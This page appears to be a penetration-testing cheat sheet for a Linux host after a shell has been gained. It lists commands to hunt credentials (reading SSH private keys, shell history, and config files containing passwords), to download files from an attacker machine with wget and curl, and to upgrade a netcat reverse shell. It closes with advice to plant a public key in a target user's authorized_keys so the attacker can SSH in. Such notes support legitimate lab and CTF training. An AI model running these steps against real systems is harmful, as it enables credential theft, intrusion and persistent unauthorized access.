Skip to main content

Situational Awareness

Get your bearings immediately after landing a shell: know what you’re on, who you are, and what network you can reach before doing anything else. 
whoami; id
hostname; uname -a
ip a; ip route
cat /etc/hosts
ps aux
env

Credential Hunting

Config files, shell history, and SSH keys are the highest-yield targets: grep broadly and follow the trail. 
find / -name "*.conf" 2>/dev/null | xargs grep -l "password" 2>/dev/null
cat ~/.bash_history
cat ~/.ssh/id_rsa
find / -name "id_rsa" 2>/dev/null
grep -r "password" /var/www/html/ 2>/dev/null

File Transfer

Stand up a quick HTTP server on the attacker machine and pull files down with wget or curl: works in almost every environment. 
python3 -m http.server 8080
wget http://<IP>:8080/file
curl http://<IP>:8080/file -o file

Shell Upgrade

Raw netcat shells are fragile: upgrade to a full PTY immediately so you get job control, tab completion, and proper signal handling. 
python3 -c 'import pty; pty.spawn("/bin/bash")'
# CTRL+Z
stty raw -echo; fg
export TERM=xterm

SUID Failures in Reverse Shells

Some privesc paths look valid but silently do nothing through a reverse shell. Two mechanisms cause this. No TTY. A reverse shell is a raw I/O tunnel with no TTY device. SUID binaries, sudo, and PAM-based auth require a proper TTY to grant elevated privileges. Without one, they silently drop the privilege with no error. PR_SET_NO_NEW_PRIVS. If your shell was spawned through a web server like Apache, it likely inherited this kernel flag: 
apache  (PR_SET_NO_NEW_PRIVS=1)
  └── web shell
        └── reverse shell  (inherits no-new-privs)
It’s a one-way flag: once set, every child process inherits it and it cannot be unset. The kernel ignores setuid bits and blocks any execve-based privilege gain for the entire lineage. PATH hijacks and SUID binaries both fail silently. Fix: inject your public key into the target user’s ~/.ssh/authorized_keys and SSH in. You get a clean TTY with no inherited restrictions, and the same privesc path that failed before will work.